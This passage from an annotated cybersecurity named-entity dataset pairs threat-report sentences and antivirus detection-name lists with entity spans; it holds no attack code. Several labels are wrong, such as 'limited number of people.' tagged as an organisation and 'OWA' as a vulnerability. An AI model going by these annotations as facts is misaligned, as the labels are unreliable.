"ORGANIZATION: security researchers": [[48, 68]]}, "info": {"id": "cyner2_train_007624", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.FamVT.LoringK.Trojan Backdoor.Bot.158614 Trojan-Dropper.Win32!O TrojanDropper.Loring.A11 Backdoor.Bot.158614 Backdoor.IRCBot Trojan/IRCBot.ov WORM_KWBOT.AR W32/Risk.VXNU-4867 W32.Kwbot.Worm Win32/Loring.A WORM_KWBOT.AR Win.Trojan.Obfuscated-1662 Backdoor.Bot.158614 Trojan.Win32.Reconyc.gunk Backdoor.Bot.158614 Trojan.Win32.IRCBot.dmigck Dropper.Loring.291411 Backdoor.Bot.158614 Backdoor.Bot.158614 Trojan.MulDrop5.7150 Trojan.Reconyc.Win32.6040 WORM/IrcBot.86875 Trojan[Backdoor]/Win32.IRCBot Win32.Troj.Loring.EA.kcloud Backdoor.Bot.D26B96 Troj.Dropper.W32.Loring.l8Ew 
Worm/Win32.IRCBot.R3593 TScope.Trojan.Delf Trojan.IRCBot.OV Win32/IRCBot.OV Trojan.DR.Loring!O3IAMVgzzx8 Trojan-Dropper.Win32.Loring", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007627", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan/Injector.iuc Win32.Trojan.WisdomEyes.16070401.9500.9999 Win32/Pushbot.AJZ WORM_PALEVO.SMA Win.Trojan.Ircbrute-54 Trojan.Win32.Ircbrute.eqsrw Trojan.Spambot.9818 Trojan.Injector.Win32.53831 WORM_PALEVO.SMA BehavesLike.Win32.PWSZbot.lh Backdoor.Win32.IRCBot Trojan/Win32.Unknown Trojan:Win32/Ircbrute.B Trojan.Graftor.DCFC Worm/Win32.Ckbface.R16129 Trojan.Injector!aNdlYeuOVuU", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007628", "source": "cyner2_train"}} {"text": "While the malware was not detectable by endpoint antivirus products, RSA Security Analytics was able to identify and alert on its network traffic, and RSA ECAT subsequently identified the malware.", "spans": {"MALWARE: malware": [[10, 17]], "ORGANIZATION: RSA Security Analytics": [[69, 91]], "ORGANIZATION: RSA ECAT": [[151, 159]], "MALWARE: malware.": [[188, 196]]}, "info": {"id": "cyner2_train_007629", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Script.400873 Exploit/PDF-URI2.AS Exploit-PDF.f Exploit.W32.Pidief!c PDF.Exploit.Pidief.an Bloodhound.PDF.9 Trojan.Script.400873 Exploit.Win32.Pidief.asz Trojan.Script.400873 Exploit.Script.Pidief.ibwe PDF.S.Exploit.10714 Win32.Exploit.Pidief.Anfp Trojan.Script.400873 Exploit.JS.Pdfka.MJ Trojan.Script.400873 Exploit.PDF.303 HEUR_PDFEXP.B BehavesLike.PDF.Trojan.lr Exploit:Win32/Pdffir.A Trojan.Script.D61DE9 Exploit.Win32.Pidief.asz PDF/Pidief.EI Trojan.Script.400873 Exploit.Win32.Pidief.asz JS.Crypt.BSP Exploit.JS.Pdfka JS/Pdfka.BSP!exploit virus.pdf.20090837.1", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007630", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.DropperZbotS.Trojan 
Trojan-Spy.Win32.Zbot!O Trojan.AutoIt.Pik.A Backdoor/Poison.evja Trojan.Zbot Trojan.Win32.Autoit.pik Trojan.Win32.Autoit.exoora Trojan.Win32.Z.Autoit.955563 Troj.W32.Autoit!c BehavesLike.Win32.Dropper.dc Trojan.Win32.Injector Trojan.Autoit.kzp TR/AD.Zbot.cgaww Trojan.Win32.Autoit.pik Trojan:Win32/Krilog.A Trojan.Autoit.F Win32/Injector.Autoit.AOI Win32.Trojan.Autoit.Edne W32/Autoit.NWS!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007631", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.DakusarDRW.Trojan Trojan.Blocker.Win32.34866 Trojan.DownLoader24.32105 BehavesLike.Win32.Shodi.tc Worm:Win32/Icorimg.A Trojan.Strictor.D1C7BA HEUR/Fakon.mwf Trojan.Worm!33g50yRKTx8 Trojan.FLCM!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007633", "source": "cyner2_train"}} {"text": "Upon further inspection, the RAT appeared to share many similarities with an old Chinese backdoor known as Hacker's Door first released publicly in 2004 and updated in 2005.", "spans": {"MALWARE: the RAT": [[25, 32]], "MALWARE: an old Chinese backdoor": [[74, 97]], "MALWARE: Hacker's Door": [[107, 120]]}, "info": {"id": "cyner2_train_007635", "source": "cyner2_train"}} {"text": "A backdoor also known as: BackDoor-CMQ.dldr Win32.Trojan.WisdomEyes.16070401.9500.9999 TROJ_HORST.SMPE Monitor.W32.WebWatcher.lt5Y TROJ_HORST.SMPE BackDoor-CMQ.dldr Trojan.Graftor.D476C BScope.Malware-Cryptor.Win32.313 Trojan.Win32.Cosmu W32/Dloader.BOW!tr.dldr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007637", "source": "cyner2_train"}} {"text": "The campaign was active between November 2016 and January 2017, targeting a limited number of people.", "spans": {"THREAT_ACTOR: campaign": [[4, 12]], "ORGANIZATION: limited number of people.": [[76, 101]]}, "info": {"id": "cyner2_train_007638", "source": "cyner2_train"}} {"text": "Quasar is a .NET Framework-based open-source RAT.", "spans": {"MALWARE: Quasar": [[0, 6]], 
"SYSTEM: .NET": [[12, 16]], "MALWARE: RAT.": [[45, 49]]}, "info": {"id": "cyner2_train_007640", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Win32.Z.Delf.2373896 Troj.Spy.W32.Zbot.lw7D Win32.Trojan-downloader.Rakhni.Html Trojan-Downloader.Win32.Delf W32/Application.AJYX-3726 TrojanDownloader.Rakhni.ec TR/Dldr.Delf.tbxxd W32/Dloader.CDW!tr Trojan[Downloader]/Win32.Rakhni Trojan.Application.Bundler.InstallMonster.392 Trojan-Downloader.Win32.Rakhni.jqc Trj/CI.A Win32/Trojan.036", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007641", "source": "cyner2_train"}} {"text": "While it is not clear whether the primary goal of the attack was delivering the malicious payload or capturing the targets OWA credentials, this attack uses an OWA phish to additionally pushes a malicious document with a Veil-Framework payload capable of downloading further malware.", "spans": {"MALWARE: malicious payload": [[80, 97]], "ORGANIZATION: OWA": [[123, 126]], "MALWARE: attack": [[145, 151]], "VULNERABILITY: OWA": [[160, 163]], "MALWARE: Veil-Framework payload": [[221, 243]], "MALWARE: malware.": [[275, 283]]}, "info": {"id": "cyner2_train_007643", "source": "cyner2_train"}} {"text": "Installed with backdoored software, for example:- Telegram.exe - mech_korolya_artura_2017.HDRip.exe", "spans": {"MALWARE: backdoored software, for": [[15, 39]]}, "info": {"id": "cyner2_train_007645", "source": "cyner2_train"}} {"text": "Founded in 2013, the Android Marcher mobile malware has widely been targeting Google Play -- harvesting user credentials and credit card data.", "spans": {"MALWARE: Android Marcher mobile malware": [[21, 51]], "SYSTEM: Google Play": [[78, 89]]}, "info": {"id": "cyner2_train_007646", "source": "cyner2_train"}} {"text": "Ransomware persists as one of the top crimeware threats thus far into 2016.", "spans": {"MALWARE: Ransomware": [[0, 10]], "MALWARE: crimeware threats": [[38, 55]]}, "info": {"id": "cyner2_train_007647", "source": 
"cyner2_train"}} {"text": "A backdoor also known as: W32.FamVT.AxVDb.Trojan Trojan.Rincux.AW Trojan.Injector.26488 Trojan.Rincux.AW Trojan.Injector Tool.StormAttack.Win32.10 Win32.Trojan.WisdomEyes.16070401.9500.9999 Backdoor.Trojan Win.Trojan.Rincux-6417593-0 Trojan-DDoS.Win32.StormAttack.c Trojan.Rincux.AW Trojan.Win32.Tdss.bziyas Trojan.Rincux.AW TrojWare.Win32.Magania.~AAC DDoS.Storm.156 BehavesLike.Win32.Backdoor.km TrojanDDoS.StormAttack.a Trojan[Rootkit]/Win32.TDSS DDoS:Win32/Stormser.A Trojan.Rincux.AW Trojan-DDoS.Win32.StormAttack.c BScope.Trojan.Win32.Inject.2 Trojan-Downloader.Win32.Pangu W32/ServStart.AS!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007648", "source": "cyner2_train"}} {"text": "Daserf's main purpose is information stealing and the Trojan is capable of gathering information from infected computers and relaying it back to attacker-controlled servers.", "spans": {"MALWARE: Daserf's": [[0, 8]], "MALWARE: Trojan": [[54, 60]], "SYSTEM: infected computers": [[102, 120]], "SYSTEM: attacker-controlled servers.": [[145, 173]]}, "info": {"id": "cyner2_train_007651", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan-Dropper.Win32.Flystud!O Trojan.Hookmoot.S217748 Trojan.Symmi.D7D5 Win32.Worm.FlyStudio.mc Trojan.Dropper Win32/SillyAutorun.ALB Win.Trojan.Rootkit-7763 Win32.Trojan.FlyStudio.A Trojan-GameThief.Win32.OnLineGames.boif Trojan.Win32.QQPass.esaped Troj.Dropper.W32.Flystud.lBWL Trojan.MulDrop5.5320 Dropper.Flystud.Win32.139 BehavesLike.Win32.Autorun.vc Trojan/PSW.OnLineGames.cvvq RKIT/Tiny.BK.2 Trojan:Win32/Englov.A Trojan-GameThief.Win32.OnLineGames.boif HEUR/Fakon.mwf Rootkit.Tiny Trojan.AutoRun Win32/FlyStudio.A Trojan.TenThief.QQPsw.tss Worm.Autorun!1DOkY6YfgQ8 Rootkit.Win32.Tiny W32/BDoor.DRV!tr Win32/Trojan.dd5", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007653", "source": "cyner2_train"}} {"text": "But we recently identified an app that demonstrated new 
ways of successfully evading Apple's code review.", "spans": {"ORGANIZATION: Apple's": [[85, 92]]}, "info": {"id": "cyner2_train_007656", "source": "cyner2_train"}} {"text": "The stolen credentials may be used for remote access into the victim network if applicable.", "spans": {"SYSTEM: the victim network": [[58, 76]]}, "info": {"id": "cyner2_train_007657", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Darkshell BehavesLike.Win32.Ipamor.nm Trojan[Downloader]/Win32.Delf Trojan:WinNT/Darkshell.C Trojan/Win32.CSon.R1800 Trojan.Win32.Scar.mg", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007658", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.HfsAutoB.B01D Troj.Crypt.Tpm!c BehavesLike.Win32.PWSQQPass.vc Trojan:Win32/Valan.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007659", "source": "cyner2_train"}} {"text": "It can also imitate a legitimate website to lure you into revealing your sensitive information.", "spans": {}, "info": {"id": "cyner2_train_007660", "source": "cyner2_train"}} {"text": "Dyreza originally focused on intercepting end-user bank logins, and later expanded to job hunting, file hosting, domain registration, website hosting, file hosting, tax services, and online retail categories", "spans": {"MALWARE: Dyreza": [[0, 6]], "ORGANIZATION: job hunting, file hosting, domain registration, website hosting, file hosting, tax services, and online retail categories": [[86, 207]]}, "info": {"id": "cyner2_train_007661", "source": "cyner2_train"}} {"text": "Brain Test has been removed from Google Play since September 24.", "spans": {"MALWARE: Brain Test": [[0, 10]], "SYSTEM: Google Play": [[33, 44]]}, "info": {"id": "cyner2_train_007662", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.FamVT.DinwoodAATTC.Worm Trojan.Zenshirsh.SL7 TSPY_EYDROP.SMA Win32/Oflwr.A!crypt TSPY_EYDROP.SMA Win.Worm.Allaple-5 Trojan-Dropper.Win32.Dinwod.acqn 
Trojan.Win32.Dinwod.ejafor Troj.Dropper.W32.Dinwod.toVw TrojWare.Win32.TrojanDropper.Dinwod.A Trojan.Inject1.58305 BehavesLike.Win32.Dropper.wh TrojanDropper.Dinwod.ale Worm[NET]/Win32.Nimda.gic Trojan-Dropper.Win32.Dinwod.acqn Trojan/Win32.OnlineGameHack.C33730 TrojanDropper.Dinwod Trojan.Dropper Trojan.DR.Dinwod!dCCk6/8cSJk", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007663", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Win32.Symmi!O WS.Reputation.1 OnLineGames.IRMW Win32/Oflwr.A!crypt Riskware.Win32.FakeLPK.cwuava BackDoor.BlackHole.21297 TR/Obfuscated.XZ.937 HackTool.Sniffer.WpePro PSW.OnlineGames4.BEIZ", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007665", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Connapts Trojan/Small.ndx Trojan.Heur.LP.EDC094 Win32.Trojan.WisdomEyes.16070401.9500.9999 Trojan.Win32.MLW.dylhy W32/Trojan.CISW-8628 Backdoor.Bot/Variant Trojan/Win32.Xema.C93063 W32/Small.NDX!tr Win32/Backdoor.796", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007666", "source": "cyner2_train"}} {"text": "This spring, the author of the NukeBot banking Trojan published the source code of his creation.", "spans": {"THREAT_ACTOR: the author": [[13, 23]], "MALWARE: NukeBot banking Trojan": [[31, 53]]}, "info": {"id": "cyner2_train_007667", "source": "cyner2_train"}} {"text": "A backdoor also known as: Adware.ELEXCRTD.Win32.5604 Trojan.Johnnie.D709 not-a-virus:AdWare.Win32.Elex.sgn Adware.Mutabaha.1819 RiskTool.Uncheckit.l TR/Chuckenit.dglxl Trojan:Win32/Chuckenit.A not-a-virus:AdWare.Win32.Elex.sgn", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007668", "source": "cyner2_train"}} {"text": "This blog post highlights the technical innovations that we found in the latest versions of Carbon we have discovered.", "spans": {"MALWARE: Carbon": [[92, 98]]}, "info": {"id": "cyner2_train_007669", "source": 
"cyner2_train"}} {"text": "A backdoor also known as: Backdoor.Slingup BKDR_SLINGUP.M W32/Zbot.AAJD Backdoor.Trojan BKDR_SLINGUP.M Trojan.Win32.Yakes.pqep Trojan.Win32.Inject.ecmohu Trojan.Win32.Z.Yakes.672768 Troj.W32.Yakes.tn6w BackDoor.Tordev.8 Trojan.Win32.Injector W32/Zbot.EUMY-8878 TR/Injector.juol Trojan/Win32.Yakes Trojan:Win32/Casidel.A Trojan.Win32.Yakes.pqep Trojan.Yakes Trojan.Yakes Trj/CI.A Win32/Injector.CXUT Win32.Trojan.Yakes.Ehid Trojan.Yakes!YuLYvE8ikp0 W32/Injector.CGQK!tr Win32/Trojan.621", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007670", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.Vetor.PE Virus.Win32.Virut.1!O W32.Virut.G Virus.Virut.Win32.27 W32/Virut.AI W32.Virut.CF Win32/Virut.17408 PE_VIRUX.A-1 Virus.Win32.Virut.ce Virus.Win32.Virut.hpeg Virus.Win32.Virut.tt Virus.Win32.Virut.CE Trojan.MulDrop1.57199 PE_VIRUX.A-1 BehavesLike.Win32.Virut.dc W32/Virut.AI Win32/Virut.bn Trojan[Dropper]/Win32.Injector Win32.Virut.nc.53248 Virus.Win32.Virut.ce Win32/Virut.F Virus.Virut.06 Win32.Virut.E Win32/Virut.NBP IM-Worm.Win32.Zeroll W32/Sality.AO Virus.Win32.VirutChangeEntry.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007672", "source": "cyner2_train"}} {"text": "Spreads via password guessing over networks", "spans": {}, "info": {"id": "cyner2_train_007673", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Kitoles Trojan.Ransom.Scarab Win32.Trojan.WisdomEyes.16070401.9500.9547 W32/Trojan.LUOM-4097 Ransom.CryptXXX Win.Ransomware.Scarab-6336012-1 Win32.Trojan-Ransom.Amnesia.J52DUW Trojan.Win32.Encoder.ewdzie Trojan.Win32.Z.Securityshield.193058 Trojan.Encoder.23898 Trojan-Ransom.FileCoder Trojan.Purga.w Trojan.Ransom.Scarab.3 Ransom:Win32/Kitoles.A Trojan/Win32.Scarab.R213792 Trojan-Ransom.Purga Win32.Trojan.Filecoder.Phqc Win32/Trojan.Ransom.089", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007675", "source": 
"cyner2_train"}} {"text": "This specific downloader, Cmstar, is associated with the Lurid downloader also known as Enfal'.", "spans": {"MALWARE: downloader, Cmstar,": [[14, 33]], "MALWARE: Lurid downloader": [[57, 73]], "MALWARE: Enfal'.": [[88, 95]]}, "info": {"id": "cyner2_train_007676", "source": "cyner2_train"}} {"text": "Recently Malwarebytes got access to several elements of the espionage toolkit that has been captured attacking Vietnamese institutions.", "spans": {"ORGANIZATION: Malwarebytes": [[9, 21]], "MALWARE: espionage toolkit": [[60, 77]], "ORGANIZATION: Vietnamese institutions.": [[111, 135]]}, "info": {"id": "cyner2_train_007678", "source": "cyner2_train"}} {"text": "I am not entirely sure what it is but it has some indications of fareit Trojan.", "spans": {"MALWARE: fareit Trojan.": [[65, 79]]}, "info": {"id": "cyner2_train_007679", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Dos.Bonk.C DoS.Win32.Bonk!O Dos.Bonk Win32.Trojan.Bonk.Tcwa W32/Tool.FPXO-2436 DoS.Win32.Bonk.c Trojan.Dos.Bonk.C Trojan.Win32.Bonk.ddda TrojWare.Win32.DoS.Bonk.C Trojan.Dos.Bonk.C Trojan.Inject.654 BehavesLike.Win32.ExploitMydoom.mm Backdoor.Win32.HacDef W32/VirTool.RO TR/RedCap.kudtu DoS:Win32/Bonk.C Trojan.Dos.Bonk.C DoS.Win32.Bonk.c Trojan.Dos.Bonk.C Trojan.Asthma.23305 Trojan.Dos.Bonk.C Trojan.Dos.Bonk.C Win32/DoS.Bonk.C DoS.Bonk!CFlP7tiJI8A DoS/Bonk.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007680", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Duqu Trojan.Duqu.Win32.13 TROJ_DUQU.DEC Win32.Trojan.WisdomEyes.16070401.9500.9587 Win32/Duqu.A TROJ_DUQU.DEC Win.Trojan.Duqu-14 Trojan.Win32.Duqu.evvbpp Trojan.Duqu.2 W32/Trojan.CVVB-9378 TR/Offend.6750706 W32/Duqu.A!tr Trojan:Win32/Duqu.C Worm/Win32.Stuxnet.R608 Trojan.Duqu!ZB0mf9vKpU8 Trojan.Win32.Urelas Win32/Trojan.d72", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007681", "source": "cyner2_train"}} {"text": "A 
backdoor also known as: W32.HfsAutoB.10E5 Trojan-Dropper.Win32.Decay!O Troj.Dropper.W32.Decay.fvr!c Trojan/Dropper.Decay.dst Trojan.Razy.DD584 W32/Dropper.ANEZ TROJ_DECAY.SM Trojan-Dropper.Win32.Decay.fvr Trojan.Win32.Decay.biarma TrojWare.Win32.TrojanDropper.Decay.ghu Trojan.MulDrop6.60922 TROJ_DECAY.SM BehavesLike.Win32.Virut.lc W32/Risk.RTXX-1196 TrojanDropper.Decay.bo TR/Drop.Decay.ayb Trojan[Dropper]/Win32.Decay TrojanDropper:Win32/Decay.A Dropper.Decay.47104.B Trojan-Dropper.Win32.Decay.fvr Win32.Trojan.Yoybot.A Dropper/Win32.Decay.R2060 TrojanDropper.Decay Backdoor.Win32.Poison W32/Decay.FVR!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007683", "source": "cyner2_train"}} {"text": "Uptycs research team has discovered a malware family that controls its operations over the messaging service Telegram.", "spans": {"ORGANIZATION: Uptycs research team": [[0, 20]], "MALWARE: malware family": [[38, 52]], "SYSTEM: Telegram.": [[109, 118]]}, "info": {"id": "cyner2_train_007686", "source": "cyner2_train"}} {"text": "A backdoor also known as: Ransom_Blulock.R002C0CKC17 Trojan.Ransomlock.AI Ransom_Blulock.R002C0CKC17 Win32.Worm.FlyStudio.C not-a-virus:RiskTool.Win32.FlyStudio.awnz Trojan.Win32.Z.Strictor.901632.H TrojWare.Win32.FlyStudio.~UJ Trojan.Winlock.11779 TR/Strictor.901632.1 Trojan.Strictor.DC183 not-a-virus:RiskTool.Win32.FlyStudio.awnz Ransom:Win32/Blulock.A Trojan/Win32.Ransomlock.R135596 Trojan.FlyStudio Trj/CI.A Trojan.Win32.Winlock.f Ransom.FUL!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007689", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Pucedoor.Win32.63 Troj.W32.Pucedoor!c W32/Trojan.MNET-5041 Trojan.Pucedoor Trojan.Win32.Pucedoor.aa Trojan.Win32.AD.eoqlfa Trojan.Win32.Z.Pucedoor.15360 Trojan.Pucedoor.d TR/Pucedoor.hopld Trojan/Win32.Pucedoor Trojan:Win32/Mirsonk.A Trojan.Mikey.D109B5 Trojan.Win32.Pucedoor.aa Trojan/Win32.Pucedoor.R216811 Trj/CI.A 
Win32.Trojan.Pucedoor.Sxxz Win32/Trojan.Proxy.62e", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007691", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan/MSILPack.a Trojan.MSIL.VB!/kGPqcrNINQ TROJ_FAM_0000b54.TOMA Packed.MSIL.MSILPack.a Worm.Win32.Rebhip!IK Packed:W32/DonutCrypt.A Trojan.MulDrop1.40622 TROJ_FAM_0000b54.TOMA Packed.MSIL.is TrojanDropper:MSIL/VB.K Packed/Win32.MSILPack Worm.Win32.Rebhip MSIL/AntiAV.NET!tr Trj/Dropper.AJX", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007693", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor.Senna KIT/SennaSpy.30 HackTool[Constructor]/Win32.SennaSpy VTool.SennaSpy.30.kcloud Constructor:Win32/Sennaspy.3_0 Constructor.Win32.SennaSpy Win32/Constructor.Spy.58d", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007694", "source": "cyner2_train"}} {"text": "We also discovered, based on the samples we gathered, that the malware, which we call CloudTap, has been in use for over a year.", "spans": {"MALWARE: samples": [[33, 40]], "MALWARE: malware,": [[63, 71]], "MALWARE: CloudTap,": [[86, 95]]}, "info": {"id": "cyner2_train_007695", "source": "cyner2_train"}} {"text": "Last week Forcepoint tracked an interesting e-mail campaign that was distributing double zipped files with Windows Script Files WSFs inside.", "spans": {"ORGANIZATION: Forcepoint": [[10, 20]], "THREAT_ACTOR: e-mail campaign": [[44, 59]]}, "info": {"id": "cyner2_train_007696", "source": "cyner2_train"}} {"text": "Symantec has blocked attempts to infect customers in Poland, Mexico and Uruguay by the same exploit kit that infected the Polish banks.", "spans": {"ORGANIZATION: Symantec": [[0, 8]], "ORGANIZATION: customers": [[40, 49]], "MALWARE: exploit kit": [[92, 103]], "ORGANIZATION: the Polish banks.": [[118, 135]]}, "info": {"id": "cyner2_train_007697", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor/Small.acc 
Backdoor.Trojan Backdoor.Win32.Small.acc Trojan.Win32.Small.gcwll Backdoor.W32.Small.acc!c Win32.Backdoor.Small.Egnw Backdoor.Small.Win32.7271 Backdoor/Small.dwv BDS/Dalbot.147456 Trojan[Backdoor]/Win32.Small Backdoor.Win32.A.Small.147456 Backdoor.Win32.Small.acc Trojan/Win32.Dalbot.C330242 Backdoor.Small W32/Small.ACC!tr.dldr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007698", "source": "cyner2_train"}} {"text": "They are known to run watering hole and spearphishing campaigns to better pinpoint their targets.", "spans": {"THREAT_ACTOR: spearphishing campaigns": [[40, 63]]}, "info": {"id": "cyner2_train_007699", "source": "cyner2_train"}} {"text": "An investigation by Wiz Threat Research has revealed that tens of thousands of websites in East Asia have been hijacked, redirecting users to adult-themed content over the last few months.", "spans": {"ORGANIZATION: Wiz Threat Research": [[20, 39]]}, "info": {"id": "cyner2_train_007701", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.FamVT.ExpiroPC.PE Trojan.Symmi.D5257 Troj.Downloader.W32!c Trojan.Click2.53876 BehavesLike.Win32.Comame.pc TrojanProxy:Win32/Potukorp.A Trj/CI.A W32/Farfli.WF!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007702", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Dynamer.S467543 Trojan.Injector.Win32.474808 Trojan/Injector.dkps Trojan.Zbot.191 Win32.Trojan.WisdomEyes.16070401.9500.9969 Ransom_NATAS.SM1 Win.Ransomware.Satan-5713061-0 Trojan.Win32.DKPS.elolak Trojan.Win32.Z.Satan.189345 TrojWare.Win32.Lepoh.A Trojan.Packed2.39908 Ransom_NATAS.SM1 BehavesLike.Win32.Trojan.cc Ransom:Win32/Nasan.B!bit Ransom.Satan/Variant Trojan.Packed Ransom.Satan Win32/Filecoder.Natas.A Win32.Trojan.Filecoder.Hqlr Trojan-Ransom.Satan Win32/Trojan.BO.91d", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007703", "source": "cyner2_train"}} {"text": "A backdoor also known as: 
Trojan.Selfdel.B7 PUP.Optional.InstallMonster Win32.Trojan.Kryptik.zv Trojan.Win32.InstallCube.echedc Application.Win32.ICLoader.VAL Trojan.InstallCube.1058 Trojan.Win32.Crypt Trojan.ExtenBro.od Pua.Downloadmanager GrayWare[AdWare]/Win32.SmartInstaller Trojan.Barys.DD4DA Trojan:Win32/Selfdel.B PUP/Win32.ICLoader.R181040 TScope.Malware-Cryptor.SB Trj/CI.A Trojan.ExtenBro! Win32/Trojan.d13", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007704", "source": "cyner2_train"}} {"text": "A backdoor also known as: Ransom.SintaCry BehavesLike.Win32.Trojan.tc Ransom:Win32/SintaCry.A Win32.Trojan-Ransom.CryPy.C Trojan/Win32.CryptXXX.C1966139 Python/Filecoder.AB Trojan.Win32.CryPy.a", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007705", "source": "cyner2_train"}} {"text": "A backdoor also known as: HW32.Packed.7656 Spyware.OnlineGames Trojan.Barys.156 Win32.Trojan.WisdomEyes.16070401.9500.9999 Win32.Application.PUPStudio.A BehavesLike.Win32.Backdoor.tc TrojanDownloader:Win32/Neglemir.A PUA.RiskWare.DYAMAR", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007706", "source": "cyner2_train"}} {"text": "A backdoor also known as: W97M/Downloader.clk W97M.Downloader W2KM_POWLOAD.UHAOEBF Macro.Trojan.Dropperd.Auto W2KM_POWLOAD.UHAOEBF W97M/Downloader.ciz Malicious_Behavior.SB virus.office.qexvmc.1070", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007707", "source": "cyner2_train"}} {"text": "A backdoor also known as: TrojanDownloader.Rovnix.AB4 Trojan.Rovnix Trojan/Rovnix.af Trojan.Cidox.E TROJ_ROVNIX.SMA0 Win.Trojan.Rovnix-7 Trojan.Win32.Rovnix.dxtqfl Trojan.Win32.Z.Rovnix.78336.D[h] Trojan.Rovnix.Win32.624 TROJ_ROVNIX.SMA0 Trojan.Rovnix.cl W32/Rovnix.AG!tr Trojan/Win32.Rovnix Trojan.Razy.D3C8A Troj.W32.Rovnix!c Trojan/Win32.Rovnix TrojanDownloader:Win32/Rovnix.A Trojan.Win32.Rovnix.jg Trojan.Rovnix!Bc+f/jzbrBg Trojan.Win32.Rovnix Atros2.AGYW Trj/Rovnix.B Win32/Trojan.bb6", 
"spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007708", "source": "cyner2_train"}} {"text": "While we do not know for sure the source of these details, they frequently appear on public websites, such as LinkedIn or the company's own website.", "spans": {"ORGANIZATION: LinkedIn": [[110, 118]]}, "info": {"id": "cyner2_train_007709", "source": "cyner2_train"}} {"text": "A backdoor also known as: TrojanDownloader.Delf Downloader.Delf.Win32.55939 Win.Trojan.Delf-6394424-2 Trojan-Downloader.Win32.Delf.kqql Trojan.Win32.Delf.evdbxm Trojan.Win32.Z.Delf.912896 Troj.Downloader.W32.Delf!c Trojan.DownLoad3.47593 Trojan-Downloader.Win32.Delf W32/Trojan.NTEF-5615 TR/Downloader.lpmfp Trojan-Downloader.Win32.Delf.kqql Downloader/Win32.Delf.C2285081 Trj/GdSda.A Win32.Trojan-downloader.Delf.Ammc W32/Delf.CGH!tr.dldr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007710", "source": "cyner2_train"}} {"text": "A backdoor also known as: Exp.SWF.CVE-2017-11292.1 Trojan.Maljava SWF/Exploit.CVE-2017-11292.A DOC.Z.CVE-2017-1129.10752 Exploit.CVE-2017-11292.1 SWF_EXPLOIT.YYRZ Trojan.DWCI-31 EXP/CVE-2017-11292.B Trojan[Exploit]/SWF.CVE-2017-11292.a Trojan:O97M/Gamafeshi.A Trojan.SWF.Exploit", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007715", "source": "cyner2_train"}} {"text": "The hacker proceeded to leak archives of internal Hacking Team tools and communications.", "spans": {"THREAT_ACTOR: The hacker": [[0, 10]], "ORGANIZATION: Hacking Team": [[50, 62]]}, "info": {"id": "cyner2_train_007717", "source": "cyner2_train"}} {"text": "A backdoor also known as: 